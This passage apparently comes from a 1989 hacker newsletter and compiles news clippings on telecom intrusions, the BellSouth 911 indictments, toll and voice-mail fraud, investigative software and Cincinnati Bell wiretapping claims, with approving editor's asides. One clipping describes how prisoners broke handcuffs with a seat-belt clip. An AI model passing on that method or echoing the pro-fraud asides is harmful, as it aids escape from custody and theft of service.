whether 911 service was actually disrupted. "It is a matter of evidence,", he 
said. 
 
   Cook also said that while the two hackers are charged with carrying out 
their scheme between December 1988 and February 1989, the indictment came 
after a year-long investigation. Though Cook refused to say how the hackers 
were discovered or caught, it is believed that after the initial penetration 
by one of the hackers, an intrusion task force was set up to monitor 
subsequent security breaches and to gather evidence against the hackers. 
 
   If convicted on all counts, X faces a prison sentence of up to 32 years and 
a maximum fine of $222,000, and Y faces a prison sentence of 31 years and a 
maximum fine of $122,000. 
 
   The Atlanta indictment charged Robert X, Adam Z, 22 known as "The Urvile" 
and also "Necron 99", and Frank XYZ, 23 known as "The Leftist", with eight 
counts each of computer fraud, wire fraud, access code fraud and interstate 
transportation of stolen property, among other crimes. 
 
   If convicted, each defendant faces up to five years imprisonment and a 
$250,000 fine on each count. The three illegally accessed Bellsouth computers 
and obtained proprietary information that they distributed to other hackers, 
the indictment alleged. 
 
  ----EDITOR's NOTES: As is confirmed in this article, no telephone service 
was disrupted. The extent of BellSouth's inadequacy regarding security matters 
was not detailed in these articles. Here is a rundown of what may have 
possibly happened: BellSouth's SBDN (Southern Bell Data Network) which is a 
modified Telenet network that contains hundreds if not thousands of network 
nodes (individual systems) may have been accessed during which time the system 
that controls the entire network may have been possibly compromised. This 
would allow someone to access just about any system on the network, since 
Bellsouth consolidated most of their individual systems onto a large network 
(economically not a bad idea, but a security nightmare indeed). This may allow 
one to stumble onto systems dealing with 911. Since it may be interesting to 
learn how such a system operates and how the 'automatic trace' is 
accomplished, the documentation would be of some help. No need for any actual 
programs however. Possibly, maybe, an article paraphrased the operation of 911 
and was possibly to be distributed through the Phrack, Inc. newsletter. 
 
The last names of those involved were omitted. Go look them up for yourself if 
you think its that important. 
 
Just for the record: KNIGHT LIGHTNING NEVER WAS A MEMBER OF LOD. Yet another 
error in the reporting...LOD has half the 15 supposed number of members. 
 
Another article followed the above one on the same page, by the same author: 
 
Last week's disclosure of an alleged hacker theft of highly sensitive 
BellSouth Telephone Co. documentation for a nine-state 911 emergency system 
was the second serious security breach of a telephone company network to come 
to light in as many months. 
 
   In January, a trio of hackers was able to penetrate computer systems at 
Pacific Bell Telephone Co. and eavesdrop on conversations and perpetrate other 
criminal acts. [CW, Jan. 22]. 
 
   Just how vulnerable are the nation's telephone systems to hacker attacks? 
Spokesmen for BellSouth and Pacific Bell insist that their systems are secure 
and that they and other telephone companies routinely assess their 
vulnerability to hackers. 
 
   "Security is being constantly changed, every intrusion is studied, 
passwords are changed," said Terry Johnson, manager of media relations for 
BellSouth in Atlanta. 
 
   Johnson however, declined to say how the hackers allegedly were able to 
lift the documentation to a 911 emergency communication services program. 
 
   "It is a rather serious computer security breach," said Richard Ichikawa, a 
Honolulu based telecommunications consultant who specializes in designing and 
installing 911 emergency systems. Stealing documentation, as the Legion of 
Doom member is alleged to have done, many not be a particularly difficult task 
for a savvy hacker, he said. 
 
   Taking the actual program, while certainly possible, would be much more 
challenging, however. The computer the controls enhanced 911 service is "quite 
isolated" from the calling public, Ichikawa said. 
 
   A recently published report to Congress by the Office of Technology 
Assessment suggested that the security and survivability of the nation's 
communication infrastructure is at greater risk to hacker attacks than ever 
before. Business and government reliance on communications and information 
based systems has increased, thus much more is at stake when those systems 
fail, the report stated. 
 
   The increased publicity of hacker attacks may help to curb attacks by 
hackers, said Sanford Sherizen, a security consultant at Data Security 
Systems, Inc., in Natick, Mass. 
 
   Some law enforcement officials complain that the nation's telephone firms 
do not cooperate as readily as they would expect when attacks of this sort 
occur. "They [telecommunications providers] are the single biggest headache 
law enforcers have right now," said Gail Thackery, Arizona stat assistant 
district attorney. 
 
   Regional Bell operating companies contacted last week disputed that 
assertion. 
 
_____________________________________________________________________________ 
 
Source: CFCA (Communications Fraud Control Association) Communicator 
Issue: February-March 1989 
Title: But are LD networks safe? 
 
   Spread over vast distances and segmented by switches guarded by their own 
passwords, long distance networks are generally safe from virus attacks. 
According to Henry Kluepfel, Bellcore district manager of Security Planning 
intruders can easily attain the same information that is available to vendors 
and service providers. "If passwords are not changed regularly, intruders 
can quickly wreak havoc". 
 
   Scott Jarus, division director of Network Loss Prevention for Metromedia, 
and a member of CFCA's Board of Directors, says that users of "outboard" 
computer systems should not be assigned high level access to their company's 
switches or networks. "Non-proprietary hardware and software that handle 
such functions as billing collection and network database management are 
targets for unauthorized access and viruses", he says. 
 
   Mr. Kluepfel says that once hackers have the documentation they can send 
details on how to crash the systems to hundreds of bulletin boards. "We 
found that many system administrators didn't realize manufacturers install 
rudimentary default passwords." 
 
   Bellcore encourages using sophisticated codes and applying a variety of 
defenses. "Don't simply rely on a dialback modem, or a good password", says 
Mr. Kluepfel. "Above all, don't depend on a system to always perform as 
expected. And remember that new employees don't know the administrative 
measures the operator knows". 
 
   Managers should advise clients on any needed internal analysis and 
investigations, and keep abreast of technological advances when planning 
their defenses. 
 
_____________________________________________________________________________ 
 
 
Source: Same as above 
Title: Secure those gray boxes 
 
   After the FCC mandated that telcos provide test modes on the gray 
[or green (ed. note)] connection boxes usually found outside structures, 
there have been instances of persons surreptitiously clipping on handsets 
or snapping in modular connections (RJ-11) to make long distance calls on the 
residents' line. CFCA advises customers to padlock their boxes to deter such 
thievery. 
 
   John Venn, manger of Electronic Operations at PacBell's San Francisco 
office, reports that the boxes they install have separate connections for 
company and customer use, so that users have the option of securing access 
to their portion. PacBell's side has a built-in lock, while customers have 
padlock hasps. 
 
_____________________________________________________________________________ 
 
 
Source: Same as above 
Title: Product Description: Pen-Link analysis software 
Author: Mike Murman 
 
   Since 1986, Pen-Link, Ltd. of Lincoln Neb. has been producing software 
that supports telecom investigations. Last July, the company introduced an 
updated version of Pen-Link, a two-year-old program that accepts data from 
most Dialed Number Recorders (DNRs) manufactured today, pools that information 
into a common database structure, and allows the user to determine the calling 
patterns and the codes that have been compromised. 
 
   In today's ever-expanding telecommunications environment there is a need 
for faster identification and documentation of abuser call patterns to assure 
successful prosecutions. In applications of DNRs for investigative purposes, 
Pen-Link programs have reduced the time normally needed to input, analyze and 
report call data by as much as 90 percent. The result is improved productivity 
and quicker response to customers' needs. 
 
   The Pen-Link 2.0 program also provides several related features. First, it 
is a communications program, meaning that if you are using a DNR with modem 
capability or RS232 communication ports, the program can automatically load 
your call records into a PC, eliminating the time needed to key-in call 
record data. 
 
   Second, Pen-Link has an autoload format section that takes call records 
you have transferred and puts them into a standard record format. This is an 
important feature, given that the program supports multiple types of DNR 
hardware that all have unique call data formats. 
 
   In short, you can use any combination of DNRs in your investigations with 
Pen-Link and all data will be compatible. Furthermore, the program allows 
you the flexibility of purchasing new DNRs of any type, and not worry about 
duplicating your software expense or learning new software programs. [Notice 
how he keeps saying "you" in this article? (ed.)] 
 
   Finally, Pen-Link enables you to analyze and report on your call record 
information. There are 15 different call analysis reports and 6 different 
graphic reports. If these reports do not meet your needs, the program has a 
report generator that allows you to customize your analysis and reports. 
 
   Pen-Link is a dedicated program written in Turbo Pascal. The company 
elected to start from scratch and develop its own software, rather than 
simply adapting standard applications. There are two reasons for this 
approach: dedicated software programs run more efficiently, so that if a 
hacker is generating thousands of call records and you want to analyze and 
report this information, the program can provide a report much faster than if 
you were processing the data manually. 
 
   The second reason behind this strategy is that users only need to learn 
and understand the options for the pop-up menu format. Pen-Link also supports 
color monitors. 
 
   A manual editing feature allows you to enter your database and find 
specific records by the criteria you have selected; then review and edit the 
data. Manual editing also allows you to enter call data from old pen 
registers that only produce paper strips containing call information. 
 
   Another feature, the utilities section, provides several options to 
manage call information stored in your computer. This allows you to archive 
information to disk, then reload it later when it is needed. If your data 
files become corrupted, you can reconstruct and reformat them by using the 
utilities section. And if you wish to use your call data information in 
another application program, Pen-Link's utilities allow  you to create an 
ASCII text file of call information, which then can be read by these programs. 
Furthermore, the program can accept ASCII text files from other DNR software 
programs. 
 
   The program calls for an IBM or compatible PC equipped with a hard drive, 
operating under MS-DOS 2.1 or higher. Pen-Link currently supports the 
following DNRs: JSI, Mitel, Racom, Voice ID, Hekimian, Bartec, Pamco, HDS, 
and Positive Controls. If you are using a DNR that is not listed, Pen-Link, 
LTD will program its software so it can automatically load call records from 
your equipment. 
 
   The use of DNRs that automatically transfer call record data saves your 
security department considerable investigative time. Pen-Link's mission is 
to provide telcom security departments with a sophisticated investigative 
software tool that is easy to use, flexible and compatible. 
 
_____________________________________________________________________________ 
 
Source: Same as above 
Title: Extended Ky. case resolved 
 
   A 21 year-old Kentucky man was successfully convicted October 27 on 14 
counts of computer and toll fraud under a number of state statutes. The 
defendant, John K. Detherage, pleaded guilty to using his personal computer to 
identify authorization codes in order to place unauthorized long distance 
calls valued at $27,000. 
 
   Detherage had been indicted a year earlier by an Oldham County grand jury 
on six felony counts related to the scam and two misdemeanor counts of 
possessing stolen personal identification and calling card numbers. He was 
later charged with two additional counts of possessing stolen PINs. 
 
   Detherage originally was to have been tried in February 1988, but the case 
was postponed when he pleaded guilty. He was sentenced at the Oldham County 
Circuit Court at LaGrange to pay $12,000 in restitution, and relinquish all 
computer equipment and software to the court. 
 
   His charges included theft of services over $100; theft of services; four 
counts of unlawful access to a computer, second degree; possession of stolen 
credit or debit cards, and six counts of unlawful access to a computer. Four 
other counts were dismissed. 
 
   Kentucky has a number of statutes that can be applied to theft of telephone 
services. Chapter 514.060 addresses theft of services, while 514.065 describes 
the possession, use or transfer of a device for the theft of services. Theft 
of services is defined to include telephone service, and the defendant was 
charged with two counts under 514.060. 
 
   Detherage was also charged with 10 counts (six felony and four misdemeanor) 
under Chapter 434.580, which relates to the receipt of stolen credit cards. 
Kentucky interprets computer crime as involving accessing of computer systems 
to obtain money, property or services through false or fraudulent pretenses, 
representations or promises. 
 
_____________________________________________________________________________ 
 
 
Source: Same as above 
Title: Industry Overview 
 
   As major players in the telecom industry shore up the defenses on their 
telephone and computer networks, criminals [who, us?] are turning to smaller, 
less protected companies [its called survival of the fittest]. In 1988, the 
use of stolen access codes to make free long distance calls continued to be 
the favorite modus operandi among network intruders throughout the industry, 
although code abuse leveled off or declined among large carriers with well 
funded security organizations and substantial technical apparatus to defeat 
most toll and network fraud. 
 
   However, some resellers and PBX owners are being victimized by fraud of all 
types, probably because most use access codes with only six or seven digits. 
Such vulnerable systems will continue to be used by abusers to route long 
distance calls overseas. Fraudulent calls placed on a compromised system 
quickly accumulate charges the system owner must eventually pay. 
 
   Many PBX's also lack effective systems able to detect irregular activities 
and block fraudulent calls. Add to this the fact that several carriers may be 
handling the inbound and outbound WATS lines, and investigator's jobs can 
really become complex. 
 
   The sharp increase in the abuse of voice store-and-forward systems, or 
voice mail, that began alarming owners and manufacturers early last year will 
continue through 1989. Last spring, traffickers began seizing private voice 
mail systems to coordinate drug shipments. Messages can be quickly erased when 
they are no longer needed. Dealers have been receiving mailbox numbers by 
pager, then calling in recorded messages from public telephones. 
 
   No matter how long a security code may be, if intruders obtain an 800 
number to a voice mail system they can program a computer and take the time to 
break it, because it won't cost them anything. Once accessed through a PBX, 
intruders can exchange stolen lists of long distance access codes, usually 
without the system owner's knowledge. 
 
   The time it takes abusers to break into a voice mail system is 
proportionate to the number of digits in a security code. A four-digit code 
can, for example be beaten by a skilled computer operator in slightly over a 
minute. [Clarification, this is probably through the use of default security 
codes, not sequential or random scanning techniques. ed.] One problem is that 
voice mail customers don't often know what features to select when buying a 
system. And few manufactures take the initiative to advise customers of the 
importance of security. 
 
   Another problem that has been around for several years, subscription fraud, 
will continue into 1989, although telcos have reduced it by making customer's 
applications more detailed and comprehensive [like requiring customers to 
supply their credit card numbers. This way if they skip town without paying 
and the credit card is valid and not maxed out, the phone company can still 
recover the money owned them. ed.], and by checking out potential customers 
more thoroughly. Dishonest subscribers use false identification and credit 
references to obtain calling cards and services, with no intention of paying. 
 
   Intelligent software is available that aids switch and PBX owners in 
identifying, screening and blocking fraudulent calls. Another precaution is 
to add digits to access codes, because numbers of fewer than 10 digits cannot 
withstand today's intruders. A number of carriers have already gone to 14 
digits. 
 
   Some larger carriers have been sending technical representative out to 
reprogram PBX's, encourage customers to install better safeguards, and advise 
them to shut down their systems at night and on weekends. Customers should 
also expect to see billing inserts warning of the improved defenses against 
fraud. 
 
   As more companies break into the international market they will need solid 
security safeguards to protect them against intrusions of their networks. A 
small interexchange carrier (IC) in Alabama was hit hard recently by "phone 
phreakers" soon after they opened overseas service. 
 
   Other start-ups find themselves desperately trying to play catch up after 
blithely operating several years without a hitch. An IC with 30,000 customers 
in Southern California increased its seven-digit access codes to ten digits 
and it aggressively pursuing five groups of hackers its investigators 
uncovered after discovering that company-issued personal identification 
numbers were posted on computer bulletin boards. 
 
   In the final analysis, one fact emerges: widespread cooperation among 
injured parties will ensure quicker results and conserve vital company 
resources. 
 
_____________________________________________________________________________ 
 
 
Source: PC Week   April 10,1989 
Title: Keep an Ear Out for New Voice Technology 
Author: Matt Kramer 
 
   With the rise in digital transmission of voice and data, it's easy to 
assume that voice and data have merged into a muddle of indiscriminate 
material, with voice indistinguishable from data. After all, a bit's a bit, 
right? 
 
   But, those people in the white lab coats keep coming up with new ways to 
use voice technology. 
 
   The telephone companies are the ones poised to make the most of this 
technology. U.S. Sprint recently announced that it was experimenting with the 
use of "voice prints"--a recording of a verbal password that would be used to 
help identify authorized subscribers using their U.S. Sprint telephone charge 
cards, which would help cut down on hackers trying to steal telephone service. 
Subscribers would record a voice print of a verbal password. Then, when they 
were using their charge cards, they would repeat the passwords to verify their 
identities. 
 
   Northern Telecom has embarked on its own efforts to bring voice-recognition 
technology to public telephone service. it is selling telephone companies a 
new billing service that uses voice-recognition technology to automate collect 
and third-number billing calls. 
 
   Called the Automated Alternate Billing Service (AABS), the system calls the 
party to be billed and "asks" if the charges will be accepted. The Northern 
Telecom switch "listens" to the response and either completes the call or 
informs the calling party that the charges have been refused. 
 
   Northern Telecom also plans to use voice technology to offer other 
features, such as allowing the system to announce the caller's name in the 
party's own voice and stating the call's origin, such as the name of a city, 
a university or an institution. 
 
   The big draw for phone companies, of course, is reduction of personnel 
costs, since no human operator assistance is needed. That's an option for lots 
of corporate financial officers who have been attracted to automated-attendant 
phone systems because they can replace a bevy of switchboard operators. 
 
   What would be interesting about the Northern Telecom technology is to see 
if it can be expanded to other gear, such as private branch exchanges, and if 
if can beef up the automated-attendant feature. Rather than require callers 
to punch a lot of buttons to get in touch with someone, perhaps voice 
recognition could be used to "listen" for a name and then direct the call to 
the appropriate party. That would be especially useful in situations where you 
don't know the exact extension of whomever you are calling. Trying to maneuver 
around an on-line telephone directory can be a real pain in the neck. 
 
   At the same time, voice-recognition technology can be paired with voice 
mail so that users can access their voice mailboxes without having to punch in 
an identification number or password or to deal with a menu. It would be a lot 
easier to just say, "Read messages". 
 
   There's still a lot of potential to be developed in voice technology. 
 
_____________________________________________________________________________ 
 
 
Source: PC WEEK   May 15, 1989 
Title: MCI to Provide Transition to ISDN 
Author: Matt Kramer 
 
   MCI Communications Inc. hopes to give its customers a smoother transition 
to ISDN with new services that offer many of the technology's features without 
requiring costly upgrades to ISDN-compatible equipment. 
 
   The communications company recently announced new Integrated Services 
Digital Network and "ISDN-equivalent" services that will provide MCI customers 
with network-configuration, control and management features, according to 
company officials. 
 
   The equivalent services, which will be available this fall, run over 
existing in-band signaling channels. True ISDN services require a separate 
out-of-band D channel for signalling. 
 
   MCI's full ISDN services are scheduled for delivery in the first quarter of 
next year. 
 
   The equivalent services, while not providing the full ISDN feature set, are 
designed to introduce customers to the benefits of ISDN before requiring them 
to make the investment in ISDN-compatible telecommunications gear, officials 
said. 
 
   "While they may not want to make that expenditure now, they certainly want 
to have ISDN-like services available", said Kevin Sharer, senior vice 
president of sales and marketing at MCI, in Washington. 
 
   The equivalent products include the MCI 800 Enhanced Services Package, 
which allows customers with dedicated access lines to receive the number of 
the calling party just prior to receiving the call. This Automatic Number 
Identification (ANI) is then used to query a database to bring up a customer's 
account or other information, according to officials. 
 
   Northern Telecom Inc. and Rockwell International Corp. have developed new 
software for their private branch exchanges that permits the switches to 
handle in-band ANI transmission. 
 
   Some observers expect the equivalent services will be useful in the 
evolution from existing telecommunications to ISDN. "If all you need is ANI, 
then the equivalent services might be just what you want", said Claude Stone, 
vice president of product development at the First National Bank of Chicago 
and vice chairman of the national ISDN Users Forum. 
 
_____________________________________________________________________________ 
 
Source: A newspaper 
Date: Sometime in June 
Title: Sheriff's prisoners find handcuffs are a snap to get out of 
Author: unknown 
 
   Ten jail prisoners who discovered an ingenious way to escape from handcuffs 
are sending alarms across the nation. Emergency bulletins will be sent to law 
enforcement agencies via teletype machines nationwide. On Friday, deputies 
were taking 10 prisoners from the jail downtown to another one in the city. 
All were handcuffed.  "When the deputy opened the back of the van, all 10 guys 
were smiling and said, 'See what we did,'" the Sheriff said. Each prisoner 
held up his arms to show broken handcuffs. 
 
   The culprit was a simple seat belt clip. The circular cuffs are connected 
with a chain, held tightly to each cuff by a swivel-head link that moves 
freely to ensure that the chain cannot be twisted when the wrists move. Seat 
belt clips typically have one or two holes, or slots, that lock them into 
place with the buckle. The prisoners learned that jamming the swivel-head on 
the clip stops the swivel head from turning freely. "A quick twist of the 
wrist, and the chain shears off at the cuff," the sheriff said. 
 
   The sheriff ordered seat belts removed from jail vans. He also ordered 
that the prisoners in cruisers be handcuffed with their hands behind their 
back and the seat belts locked firmly across them. Deputies often handcuffed 
prisoners' hands in front of their bodies. But even if prisoners were cuffed 
behind their backs, it would not be difficult for them to manipulate the 
swivel head into a seat belt buckle and twist themselves free -- if they 
could reach the seat belt. "This is a danger to every law enforcement officer 
in the country", the sheriff said. 
 
   Handcuff manufacturers contacted Friday are studying the possibility of 
redesigning the handcuffs by enlarging the swivel head or placing some type 
of shroud over it. "People in jail have 24 hours a day to figure a way out" 
said the sheriff. 
 
   "Although only 10 people know the technique, I guarantee that the entire 
jail population will know how to do it before the day is up,". "The only 
people who won't know about it is law enforcement officers".  The sheriff 
met Friday with representatives of several local and federal agencies. An 
FBI spokesman said the escape technique will be described in the FBI's 
nationally distributed LAW ENFORCEMENT BULLETIN. 
 
   Although the sheriff was grateful to learn about the technique from 
prisoners who did not try to escape, he was not amused. He told deputies, 
"Charge them with destruction of county property. We'll see how funny they 
think that is." 
 
_____________________________________________________________________________ 
 
Title: Federal grand jury probes Cincinnati Bell wiretapping flap 
Source: Data Communications 
Issue: November 1988 
Author: John Bush 
 
   A federal grand jury in Ohio is investigating illegal wiretapping 
allegations involving two former employees of Cincinnati Bell who claim the 
telephone company ordered them for more than a decade to eavesdrop on 
customers. 
 
   In addition, an attorney who filed a class-action lawsuit against 
Cincinnati Bell on behalf of the people and companies who were allegedly 
wiretapped, says he is trying to prove that the telephone company sold the 
information gained from the electronic surveillance. 
 
   A Cincinnati Bell spokesperson denied the charges, saying they were 
trumped-up by the two former employees, who are seeking revenge after being 
fired by the telephone company. 
 
   The lawsuit has been filed against Cincinnati Bell Inc. on behalf of 
Harold Mills, a former police lieutenant and former commander of the 
Cincinnati Vice Squad, as well as a number of other individuals and companies. 
Among the alleged victims mentioned in the complaint were Sen. Howard 
Metzenbaum (D-Ohio) and Proctor and Gamble Co. (Cincinnati, Ohio). 
 
   Gene Mesh, the attorney who filed the lawsuit, believes the Cincinnati Bell 
case is not an isolated incident but a trend...an explosion of cancer that 
"this kind of thing [wiretapping] has developed its own markets." 
 
   When asked if Cincinnati Bell was selling the information gained from 
tapping, Mesh said "we are proceeding along evidentiary lines to prove this." 
 
   Thus far, the civil action hinges on the testimony of two former Cincinnati 
Bell employees, Leonard Gates, a supervisor, and Robert Draise, an installer 
who at one time worked for Gates. Their combined testimony states that, under 
the auspices of Cincinnati Bell, they conducted over 1,200 illegal wiretaps 
from 1972 to the present. 
 
   According to Gates, as a result of the Proctor and Gamble wiretap, "we 
were into all of P&G's databases." In addition, both Gates and Draise claim 
to have been in on illegal wiretaps of General Electric Co.'s Aircraft Engines 
Division near Cincinnati. Draise also claims that he was ordered to identify 
all of GE's facsimile and modem lines for Cincinnati Bell. 
 
   Neither Proctor and Gamble nor General Electric would comment. However 
Sen. Howard Metzenbaum's Washington, D.D., office says that the Senator 
"found the news shocking and is awaiting more information to see if it 
[the wiretap] actually happened. 
 
   Meanwhile Cincinnati Bell maintains that the suit and allegations are 
merely Gates's and Draise's way of getting back at the phone company for 
having fired them. 
 
   Cyndy Cantoni, a spokesperson for Cincinnati Bell, said that "we have heard 
the allegations that we wiretapped, but if Draise or Gates did any tapping, it 
wasn't done at Cincinnati Bell's request." 
 
   Cantoni also cited a letter from Cincinnati Bell President Ray Clark that 
went out to all Cincinnati Bell employees in the wake of the publicity 
surrounding the wiretapping accusations. The letter stated that Gates had been 
warned in April 1985 against continuing an affair with an employee he had been 
supervising and who had accused him [Gates] of sexual harassment, according to 
Cantoni. 
 
   The letter went on to say that Gates reacted to the warning with 
insubordination and threats and "carried on a campaign against the company." 
As a result, Gates was fired for insubordination, says Cantoni. Robert Draise 
was fired after he was convicted of misdemeanor wiretapping charges for 
tapping the phone line of a friend's girlfriend, Cantoni says. 
 
   Cincinnati Bell is an independent telephone company that was allowed to 
keep the "Bell" trademark after divestiture, since it is older than AT&T, 
says Cantoni. 
 
[ End of Document ] 
 
